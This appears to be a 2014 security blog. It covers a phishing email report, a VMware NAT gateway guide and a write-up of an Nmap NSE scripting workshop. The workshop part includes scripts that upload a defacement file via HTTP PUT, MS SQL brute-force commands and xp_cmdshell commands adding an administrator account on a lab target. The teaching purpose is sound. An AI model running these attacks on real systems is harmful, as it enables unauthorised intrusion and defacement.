Wednesday, May 14, 2014

New-Phishing

Here comes a new phishing email:

Good Morning

I hope you slept well. I uploaded some documents via Google Drive for your review.


Regards

--

Rosmawani Binti Hj Mohd Salleh | Manager

Corporate Finance Department
Credit Management Unit 

Telekom Brunei Berhad

TelBru Brunei Berhad Headquarters, Unit 1.01, Block D,
Yayasan Sultan Haji Hassanal Bolkiah Complex
Jalan Pretty | Bandar Seri Begawan BS8711, Negara Brunei Darussalam





The address is interesting. It is huge, so I have put it on Pastebin: http://pastebin.com/Z0vhfzd4

Be aware Be safe.

Whois




Friday, March 28, 2014

Vmware Player-Guest as internet gateway

Recently a friend asked me about setting up an Internet gateway on a virtual guest system and configuring it so that the other virtual machines and the host connect to the Internet through it.

The following steps were used to test this successfully.

Details of the setup

All systems used are Linux.

ppp0 -> Internet connection over a USB dongle.
eth0 -> the interface VMware Player uses by default.

IP details
ppp0 -> assigned by the ISP via DHCP.
eth0 -> 192.168.2.140/24


The following lines can be saved in /etc/rc.local so they are applied on every boot:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE

Note that the FORWARD rule accepts everything arriving on eth0, and the replies coming back in on ppp0 are only forwarded because the default FORWARD policy is ACCEPT; if that policy is set to DROP, a matching rule for the return traffic is needed as well.

That is all. This machine now acts as a Linux router.

Setup for the other virtual guests (command line):

ifconfig eth0 192.168.2.130/24
route add default gw 192.168.2.140


GUI


On the host system

Add the route:
sudo route add default gw 192.168.2.140 vmnet8

Add a DNS server to /etc/resolv.conf:
nameserver 8.8.8.8

The IP address is already present on vmnet0.

After the route is set up, the gateway guest may lose its IP address. Just set it again with the following command:
ifconfig eth0 192.168.2.140/24
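Here is the whole procedure as one re-runnable script. It is an added example, not from the original post, and it tightens two things: FORWARD is default-deny, so only traffic from the 192.168.2.0/24 side and the replies to it are forwarded (the rc.local lines above forward everything entering eth0 and rely on the default ACCEPT policy), and the chains are flushed before rules are added, so running it twice does not stack duplicate rules. Interface names and addresses default to the ones used in the post; iproute2 (`ip`) and the iptables conntrack match are assumed to be available on the guests.

```shell
#!/bin/sh
# Added example, not part of the original post: stateful NAT gateway for a
# VMware guest plus the client-side commands, generated as text so they can
# be reviewed (show) before they are applied (gateway / client) as root.
# Assumptions: interface names eth0/ppp0 and the 192.168.2.0/24 network from
# the post; iproute2 and the 'conntrack' match are available.

LAN_IF="${LAN_IF:-eth0}"            # VMware-facing side of the gateway guest
WAN_IF="${WAN_IF:-ppp0}"            # USB dongle / ISP side
LAN_NET="${LAN_NET:-192.168.2.0/24}"

# Emit the commands that make this guest a default-deny NAT router.
# $1 = LAN interface, $2 = WAN interface, $3 = LAN network in CIDR form.
gateway_rules() {
    lan="$1"; wan="$2"; net="$3"
    cat <<EOF
sysctl -w net.ipv4.ip_forward=1
iptables -F FORWARD
iptables -t nat -F POSTROUTING
iptables -P FORWARD DROP
iptables -A FORWARD -i $lan -o $wan -s $net -j ACCEPT
iptables -A FORWARD -i $wan -o $lan -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o $wan -s $net -j MASQUERADE
EOF
}

# Emit the commands a client guest (or the host, on its vmnet interface)
# needs to use the gateway.
# $1 = interface, $2 = own address/prefix, $3 = gateway address, $4 = DNS server.
client_rules() {
    cat <<EOF
ip addr replace $2 dev $1
ip route replace default via $3 dev $1
printf 'nameserver %s\n' $4 > /etc/resolv.conf
EOF
}

# Read generated commands from stdin and run them, stopping at the first failure.
apply_rules() {
    while IFS= read -r line; do
        echo "+ $line"
        sh -c "$line" || return 1
    done
}

case "${1:-}" in
    show)     gateway_rules "$LAN_IF" "$WAN_IF" "$LAN_NET" ;;
    gateway)  gateway_rules "$LAN_IF" "$WAN_IF" "$LAN_NET" | apply_rules ;;
    client)   client_rules "${2:-eth0}" "${3:-192.168.2.130/24}" \
                           "${4:-192.168.2.140}" "${5:-8.8.8.8}" | apply_rules ;;
    *)        : ;;   # no verb given: only define the functions
esac
```

`sh gateway.sh show` prints the rule set for review; `sudo sh gateway.sh gateway` applies it on the gateway guest (put that line in /etc/rc.local in place of the three commands above); `sudo sh gateway.sh client eth0 192.168.2.130/24 192.168.2.140 8.8.8.8` configures another guest, and on the host the interface argument would be vmnet8. Because the script flushes FORWARD and POSTROUTING before adding rules, it is safe to run again after the dongle reconnects.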








Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This is about the NULL Humla on Nmap NSE scripting by Sudhir Babu and Rupam Bhattacharya, held at the Centre for Internet and Society, Bangalore.

Agenda:

1. Getting familiar with the usage of Nmap scripting
2. Going inside a script: reading the source and understanding the fundamental structure
3. Writing your own script and executing it with Nmap against a target machine
4. Getting a shell on the target using the default scripts against a vulnerable system

Prerequisites: two systems
1. Any system running the latest version of Nmap
2. A vulnerable target system (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org 

Location of the script files on a Linux system: typically /usr/share/nmap/scripts for a distribution package, or /usr/local/share/nmap/scripts for a build from source. Running nmap --script-help <name> prints a script's documentation without scanning anything.




How to run scripts

# nmap -p80 -Pn -n 192.168.2.128 --script=http-date

This scans port 80 only (-Pn skips host discovery, -n skips reverse DNS) and, if the port is open, runs the http-date script against it. The script's own description field reads:

"Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following is Nmap's own daytime script, which retrieves the day and time from the Daytime service. Note the pieces every script has: the required libraries, a description, categories, a portrule that decides when the script runs, and an action that does the work:

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}


portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        if status then
                return result
        end
end

Full details of the script format are at http://nmap.org/book/nse-script-format.html

The following script gets the list of HTTP methods enabled on a web server:

local http = require "http"
local shortport = require "shortport"

description = [[
Retrieves the methods enabled on an HTTP server by sending an OPTIONS request.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
        -- Send OPTIONS / and hand the interesting part of the answer back
        local response = http.generic_request(host, port, "OPTIONS", "/")
        if not response or not response.status then
                return nil  -- no HTTP answer at all: print nothing for this port
        end
        -- Header names are lowercased by the http library; Allow carries the method list
        return response.header["allow"] or ("no Allow header (status " .. response.status .. ")")
end

The description, author and license fields are optional for a script you only use yourself.

The script opens a connection to the web server port, sends an OPTIONS request and returns the Allow header from the server's answer to the Nmap engine, which prints it under the script name, as shown below. Here the server allows GET, HEAD, POST and OPTIONS.



Another run, against a web server that also allows dangerous methods such as DELETE, PUT and MOVE:



How to put a file onto the web server using an NSE script.

Method one, using http.put:

local http = require "http"
local shortport = require "shortport"

description = [[
Uploads a text file to the web server with an HTTP PUT request.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

-- This writes to the target, so it is "intrusive", not "default":
-- a plain -sC scan must never run it by accident
categories = {"intrusive"}

portrule = shortport.http

action = function(host, port)
        -- http.put(host, port, path, options, body)
        local response = http.put(host, port, "/deface.txt", nil, "defacingweb")
        if not response or not response.status then
                return nil
        end
        -- 201 Created or 204 No Content means the server stored the file
        return "PUT /deface.txt returned HTTP " .. response.status
end


To DELETE the uploaded file:

local http = require "http"
local shortport = require "shortport"

description = [[
Deletes a file from the web server with an HTTP DELETE request.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"intrusive"}

portrule = shortport.http

action = function(host, port)
        -- generic_request takes the method as a string, so any verb can be sent
        local response = http.generic_request(host, port, "DELETE", "/deface.txt")
        if not response or not response.status then
                return nil
        end
        -- 200, 202 or 204 means the server accepted the deletion
        return "DELETE /deface.txt returned HTTP " .. response.status
end

SOCKET

Creating the file with a raw NSE socket instead of the http library:

local nmap = require "nmap"
local shortport = require "shortport"

description = [[
Uploads a file with a PUT request built by hand and sent over an NSE socket.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"intrusive"}

portrule = shortport.http

action = function(host, port)
        -- Create the socket inside action so every host/port pair gets its own
        local socket = nmap.new_socket()
        socket:set_timeout(5000)
        local status = socket:connect(host, port)
        if not status then
                return nil
        end
        local body = "deface"
        -- Host header taken from the target being scanned, Content-Length from the body
        local request = "PUT /deface.txt HTTP/1.1\r\n"
                .. "Host: " .. host.ip .. "\r\n"
                .. "Content-Length: " .. #body .. "\r\n"
                .. "Connection: close\r\n\r\n"
                .. body
        socket:send(request)
        local ok, response = socket:receive()
        socket:close()
        if ok then
                return response
        end
end
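Putting the pieces of the workshop together, here is an added example, not from the workshop and not one of Nmap's own scripts: a check for a writable web root that leaves nothing behind. It sends OPTIONS and, only if PUT is advertised, uploads a marker file with a random name, reads it back with GET and removes it with DELETE, reporting the status of each step. It also uses two facilities the workshop scripts skip: a script argument read with stdnse.get_script_args and ordered structured output from stdnse.output_table. The script name http-write-check, its argument name and the marker file name are choices made for this example.

```lua
-- Added example, not part of the workshop or of Nmap's script collection.
-- Script name, argument name and marker file name are assumptions made here.
local http      = require "http"
local shortport = require "shortport"
local stdnse    = require "stdnse"
local string    = require "string"

description = [[
Checks whether a web server lets clients write to a path. Sends OPTIONS and,
only if the Allow header lists PUT, uploads a small marker file with a random
name, reads it back with GET and removes it again with DELETE. Nothing is left
on the server unless the DELETE is refused, and that refusal is reported.
]]

---
-- @usage
-- nmap -p80 --script http-write-check --script-args http-write-check.path=/uploads/ <target>
--
-- @args http-write-check.path Directory to test. Default: /
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-write-check:
-- |   path: /uploads/
-- |   allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
-- |   put: 201
-- |   readback: ok
-- |_  delete: 204

author = "Added example"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-- intrusive: it writes to the target; never "default", so -sC will not run it
categories = {"intrusive"}

portrule = shortport.http

action = function(host, port)
  -- Script argument with a safe default (argument name chosen for this example)
  local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
  if path:sub(-1) ~= "/" then path = path .. "/" end

  -- output_table keeps insertion order, so the report reads top to bottom
  local out = stdnse.output_table()
  out.path = path

  local opts = http.generic_request(host, port, "OPTIONS", path)
  if not opts or not opts.status then
    return nil                      -- no HTTP answer at all: stay silent
  end
  local allow = opts.header["allow"] or ""
  out.allow = allow ~= "" and allow or "(no Allow header)"
  if not string.find(allow:upper(), "PUT", 1, true) then
    out.put = "not advertised, nothing uploaded"
    return out
  end

  -- Random marker name so two scans (or two testers) never collide
  local marker = path .. "nse-probe-" .. stdnse.generate_random_string(8) .. ".txt"
  local body = "nmap write probe\n"

  local put = http.put(host, port, marker, nil, body)
  out.put = put and put.status and tostring(put.status) or "no response"
  if not (put and put.status and put.status >= 200 and put.status < 300) then
    return out                      -- server refused; nothing to clean up
  end

  -- Confirm the file really landed where a client can fetch it
  local get = http.get(host, port, marker)
  out.readback = (get and get.body == body) and "ok" or "mismatch"

  -- Clean up, and report the status so a failed DELETE is visible to the tester
  local del = http.generic_request(host, port, "DELETE", marker)
  out.delete = del and del.status and tostring(del.status) or "no response"
  return out
end
```

Save it as http-write-check.nse, either in the scripts directory (then run nmap --script-updatedb once) or anywhere and pass the path to --script. Because it only uploads when PUT is advertised and removes its own marker, it can be run against a whole range with -p80,443 --script http-write-check without scattering files across the targets.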


Other examples with the default NSE scripts

MS SQL username/password brute forcing (userdb and passdb point to the wordlists):
# nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt,passdb=password.txt 192.168.0.5

Add a user through xp_cmdshell, using the credentials found above:
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to the Administrators group (net localgroup administrators <username> /add):
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run any other command, for example ipconfig:
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to null, Sudhir Babu, Rupam Bhattacharya, Riyaz Walikar and Akash Mahajan.